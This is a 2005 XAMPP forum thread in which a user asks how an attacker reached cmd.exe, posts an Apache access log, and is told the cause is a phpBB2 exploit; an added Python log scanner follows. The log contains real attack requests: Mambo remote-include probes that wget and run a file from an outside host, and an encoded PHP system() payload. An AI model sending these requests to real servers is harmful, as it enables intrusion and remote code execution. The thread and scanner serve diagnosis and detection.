Hacked? Accessed cmd.exe, how to prevent?

Problems with the Windows version of XAMPP, questions, comments, and anything related.

Postby Zeno McDohl » 29. December 2005 02:35

Check this out.
[image]

Someone mind telling me how someone is accessing my cmd.exe? Using Apache/2.0.49, how can I fix this?
Zeno McDohl
 
Posts: 6
Joined: 29. December 2005 02:30

Postby Wiedmann » 29. December 2005 03:06

Without an access.log from the same date/time as this message I can say nothing...
Wiedmann
AF Moderator
 
Posts: 17102
Joined: 01. February 2004 12:38
Location: Stuttgart / Germany

Postby Zeno McDohl » 29. December 2005 03:12

Here are the logs from when it happened (today):
Code:
24.34.111.159 - - [28/Dec/2005:00:34:21 -0500] "GET / HTTP/1.0" 200 476
66.7.255.244 - - [28/Dec/2005:01:06:22 -0500] "GET / HTTP/1.0" 200 476
193.255.32.38 - - [28/Dec/2005:03:26:22 -0500] "GET / HTTP/1.0" 200 476
207.46.98.138 - - [28/Dec/2005:04:37:00 -0500] "GET /robots.txt HTTP/1.0" 404 353
207.46.98.138 - - [28/Dec/2005:04:37:00 -0500] "GET / HTTP/1.0" 200 476
24.34.111.159 - - [28/Dec/2005:05:42:05 -0500] "GET / HTTP/1.0" 200 476
222.135.177.74 - - [28/Dec/2005:05:41:53 -0500] "GET / HTTP/1.0" 200 476
66.249.65.177 - - [28/Dec/2005:06:09:18 -0500] "GET /robots.txt HTTP/1.1" 404 353
66.249.65.177 - - [28/Dec/2005:06:09:18 -0500] "GET /chub/ HTTP/1.1" 200 4681
71.113.167.59 - - [28/Dec/2005:06:50:07 -0500] "GET / HTTP/1.0" 200 476
66.194.6.76 - - [28/Dec/2005:07:22:19 -0500] "GET / HTTP/1.1" 200 476
211.175.175.247 - - [28/Dec/2005:08:42:54 -0500] "GET / HTTP/1.0" 200 476
65.202.73.207 - - [28/Dec/2005:10:38:36 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 349
65.202.73.207 - - [28/Dec/2005:10:38:37 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 348
65.202.73.207 - - [28/Dec/2005:10:38:38 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 355
65.202.73.207 - - [28/Dec/2005:10:38:39 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 353
65.202.73.207 - - [28/Dec/2005:10:38:40 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
65.202.73.207 - - [28/Dec/2005:10:38:41 -0500] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
222.96.156.160 - - [28/Dec/2005:10:46:18 -0500] "GET http://www.abcseek.info/cgi-bin/ip1.cgi HTTP/1.0" 404 356
220.213.210.206 - - [28/Dec/2005:12:36:03 -0500] "GET / HTTP/1.0" 200 476
80.228.221.140 - - [28/Dec/2005:14:44:14 -0500] "GET /videos/ HTTP/1.1" 404 350
80.228.221.140 - - [28/Dec/2005:14:44:14 -0500] "GET /favicon.ico HTTP/1.1" 200 1406
68.142.251.133 - - [28/Dec/2005:15:11:40 -0500] "GET /robots.txt HTTP/1.0" 404 353
68.142.250.174 - - [28/Dec/2005:15:11:41 -0500] "GET /contact.html HTTP/1.0" 200 436
200.23.35.52 - - [28/Dec/2005:15:18:23 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 349
200.23.35.52 - - [28/Dec/2005:15:18:24 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 348
200.23.35.52 - - [28/Dec/2005:15:18:25 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 355
200.23.35.52 - - [28/Dec/2005:15:18:26 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 353
200.23.35.52 - - [28/Dec/2005:15:18:28 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
200.23.35.52 - - [28/Dec/2005:15:18:29 -0500] "GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 359
218.216.224.15 - - [28/Dec/2005:15:42:37 -0500] "GET / HTTP/1.0" 200 476
66.249.64.52 - - [28/Dec/2005:17:16:58 -0500] "GET /robots.txt HTTP/1.0" 404 353
66.249.64.52 - - [28/Dec/2005:17:16:59 -0500] "GET / HTTP/1.0" 200 476
207.46.98.138 - - [28/Dec/2005:17:39:22 -0500] "GET /robots.txt HTTP/1.0" 404 353
207.46.98.138 - - [28/Dec/2005:17:39:22 -0500] "GET / HTTP/1.0" 200 476
70.24.242.151 - - [28/Dec/2005:18:32:35 -0500] "GET / HTTP/1.0" 200 476
83.103.197.78 - - [28/Dec/2005:20:26:23 -0500] "GET /phpBB2 HTTP/1.1" 301 386
83.103.197.78 - - [28/Dec/2005:20:26:24 -0500] "GET /phpBB2/ HTTP/1.1" 200 21332
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_faq.gif HTTP/1.1" 200 219
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_search.gif HTTP/1.1" 200 237
83.103.197.78 - - [28/Dec/2005:20:26:28 -0500] "GET /phpBB2/templates/subSilver/images/logo_phpBB.gif HTTP/1.1" 200 7973
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_members.gif HTTP/1.1" 200 223
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_groups.gif HTTP/1.1" 200 222
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.1" 200 354
83.103.197.78 - - [28/Dec/2005:20:26:29 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_register.gif HTTP/1.1" 200 224
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_profile.gif HTTP/1.1" 200 236
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_message.gif HTTP/1.1" 200 232
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_mini_login.gif HTTP/1.1" 200 233
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/icon_latest_reply.gif HTTP/1.1" 200 135
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/folder_locked_big.gif HTTP/1.1" 200 673
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/cellpic1.gif HTTP/1.1" 200 246
83.103.197.78 - - [28/Dec/2005:20:26:30 -0500] "GET /phpBB2/templates/subSilver/images/cellpic3.gif HTTP/1.1" 200 257
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/cellpic2.jpg HTTP/1.1" 200 480
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/folder_big.gif HTTP/1.1" 200 677
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/whosonline.gif HTTP/1.1" 200 929
83.103.197.78 - - [28/Dec/2005:20:26:31 -0500] "GET /phpBB2/templates/subSilver/images/folder_new_big.gif HTTP/1.1" 200 663
83.103.197.78 - - [28/Dec/2005:20:26:37 -0500] "GET /phpBB2/templates/subSilver/images/lang_english/reply-locked.gif HTTP/1.1" 200 1515
83.103.197.78 - - [28/Dec/2005:20:26:36 -0500] "GET /phpBB2/viewforum.php?f=1&sid=d7cff77e2fda81bab6bd7ed130db9e3f HTTP/1.1" 200 26339
83.103.197.78 - - [28/Dec/2005:20:26:37 -0500] "GET /phpBB2/templates/subSilver/images/folder.gif HTTP/1.1" 200 344
83.103.197.78 - - [28/Dec/2005:20:26:37 -0500] "GET /phpBB2/templates/subSilver/images/folder_new.gif HTTP/1.1" 200 336
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_announce.gif HTTP/1.1" 200 307
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_new_hot.gif HTTP/1.1" 200 1159
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_hot.gif HTTP/1.1" 200 1178
83.103.197.78 - - [28/Dec/2005:20:26:38 -0500] "GET /phpBB2/templates/subSilver/images/folder_sticky.gif HTTP/1.1" 200 344
83.103.197.78 - - [28/Dec/2005:20:26:39 -0500] "GET /phpBB2/templates/subSilver/images/folder_lock_new.gif HTTP/1.1" 200 459
83.103.197.78 - - [28/Dec/2005:20:26:39 -0500] "GET /phpBB2/templates/subSilver/images/folder_lock.gif HTTP/1.1" 200 333
83.103.197.78 - - [28/Dec/2005:20:26:42 -0500] "GET /phpBB2//viewtopic.php?t=15&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(119)%252echr(59)%252echr(105)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1" 200 32790
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET / HTTP/1.1" 200 476
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET /main.html HTTP/1.1" 200 345
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET /top.html HTTP/1.1" 200 982
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET /zenobanner.gif HTTP/1.1" 200 32383
127.0.0.1 - - [28/Dec/2005:20:35:23 -0500] "GET /Darkff.mid HTTP/1.1" 200 7412
127.0.0.1 - - [28/Dec/2005:20:35:23 -0500] "GET /favicon.ico HTTP/1.1" 200 1406
127.0.0.1 - - [28/Dec/2005:20:35:29 -0500] "GET /start/ HTTP/1.1" 404 340
Zeno McDohl
 
Posts: 6
Joined: 29. December 2005 02:30

Postby Wiedmann » 29. December 2005 03:19

And which entry has the same time/date as the firewall message?
Wiedmann
AF Moderator
 
Posts: 17102
Joined: 01. February 2004 12:38
Location: Stuttgart / Germany

Postby Zeno McDohl » 29. December 2005 03:21

Happened around 8:26pm, so... all of those 20:26 times.
Zeno McDohl
 
Posts: 6
Joined: 29. December 2005 02:30

Postby Wiedmann » 29. December 2005 03:35

83.103.197.78 - - [28/Dec/2005:20:26:42 -0500] "GET /phpBB2//viewtopic.php?t=15&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(73)%252echr(78)%252echr(73)%252echr(67)%252echr(73)%252echr(79)%252echr(95)%252echr(95)%252echr(95)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(119)%252echr(59)%252echr(105)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(95)%252echr(95)%252echr(95)%252echr(70)%252echr(73)%252echr(77)%252echr(95)%252echr(95)%252echr(95)%252echr(59))%252e%2527 HTTP/1.1" 200 32790

I think this is an exploit for the phpBB forum software. You should update the software and/or ask the phpBB support.
Wiedmann
AF Moderator
 
Posts: 17102
Joined: 01. February 2004 12:38
Location: Stuttgart / Germany
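The thread's access log shows three request shapes worth recognising in a log review: the Mambo/Joomla probes that pass a full URL in mosConfig_absolute_path together with a chained shell command (all answered 404, so no script was there to run them), an open-proxy probe that asks for an absolute http:// URI, and the phpBB2 viewtopic.php request whose double-URL-encoded highlight parameter carries a PHP system(chr()...) call and was answered 200, which is why it is the one that lines up with the firewall alert. The script below is an added example written for this thread, not code from the original posts, XAMPP or phpBB: it parses Apache common-log lines, decodes the request target until it is stable, tags it against a small signature list, and reconstructs any chr() chain so an analyst can read what the request tried to do. The signature list and the tag names are my assumptions; the sample lines are copied from the log posted above, except the phpBB2 line, whose chr() chain is shortened to two calls.

```python
"""Scan Apache access-log lines for the request patterns seen in this thread."""
import re
from typing import Optional
from urllib.parse import unquote

# Apache common log format: host ident user [time] "request" status size.
# The request line is matched loosely so that odd protocol strings
# such as HTTP\x01.1 from the posted log still parse.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) +(?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)$'
)

# Assumed signature set, derived only from what the posted requests contain.
# Each regex runs against the fully URL-decoded request target.
SIGNATURES = {
    # a query parameter whose value is a complete URL (remote file inclusion)
    "remote-include": re.compile(r"[?&][^=&]*=https?://", re.I),
    # _REQUEST[...] / GLOBALS= in the query: register_globals variable override
    "globals-override": re.compile(r"[?&](?:_REQUEST\[|GLOBALS=)", re.I),
    # shell commands chained into a parameter value
    "shell-command": re.compile(r"\b(?:wget|chmod|curl)\b|;\s*\./", re.I),
    # PHP evaluation primitives or chr() character building
    "code-exec": re.compile(
        r"\b(?:system|exec|passthru|shell_exec|eval)\s*\(|\bchr\s*\(\d+\)", re.I),
    # absolute URI as the request target: open-proxy probe
    "proxy-probe": re.compile(r"^https?://", re.I),
}

CHR_RE = re.compile(r"chr\((\d+)\)")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode repeatedly until stable, so %2527 -> %27 -> ' is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(target: str) -> list:
    """Return the sorted list of signature tags matching a request target."""
    decoded = fully_decode(target)
    return sorted(tag for tag, rx in SIGNATURES.items() if rx.search(decoded))


def decode_chr_chain(expr: str) -> str:
    """Turn chr(101).chr(99)... into the text it builds, for analyst review."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(expr))


def parse_line(line: str) -> Optional[dict]:
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def scan(log_text: str) -> list:
    """Return one record per flagged line, in log order, with tags and decoding."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["target"])
        if not tags:
            continue
        rec["tags"] = tags
        rec["decoded"] = fully_decode(rec["target"])
        rec["payload"] = decode_chr_chain(rec["decoded"]) if "code-exec" in tags else ""
        findings.append(rec)
    return findings


# Sample lines copied from the log posted in the thread; the phpBB2 line's
# chr() chain is shortened to two calls (constructed for this example).
SAMPLE_LOG = r"""207.46.98.138 - - [28/Dec/2005:04:37:00 -0500] "GET /robots.txt HTTP/1.0" 404 353
65.202.73.207 - - [28/Dec/2005:10:38:38 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 404 355
222.96.156.160 - - [28/Dec/2005:10:46:18 -0500] "GET http://www.abcseek.info/cgi-bin/ip1.cgi HTTP/1.0" 404 356
83.103.197.78 - - [28/Dec/2005:20:26:42 -0500] "GET /phpBB2//viewtopic.php?t=15&highlight=%2527%252esystem(chr(101)%252echr(99))%252e%2527 HTTP/1.1" 200 32790
127.0.0.1 - - [28/Dec/2005:20:35:22 -0500] "GET / HTTP/1.1" 200 476
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} status={f['status']} tags={','.join(f['tags'])}")
        if f["payload"]:
            print("  decoded chr() chain:", f["payload"])
```

The status column is the triage signal: a flagged request answered 404 hit a script that does not exist on this server, while a flagged request answered 200 reached a script that ran, and only the latter needs the follow-up Wiedmann recommends (update the affected software, check what it wrote to disk, and review the account the web server runs as).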
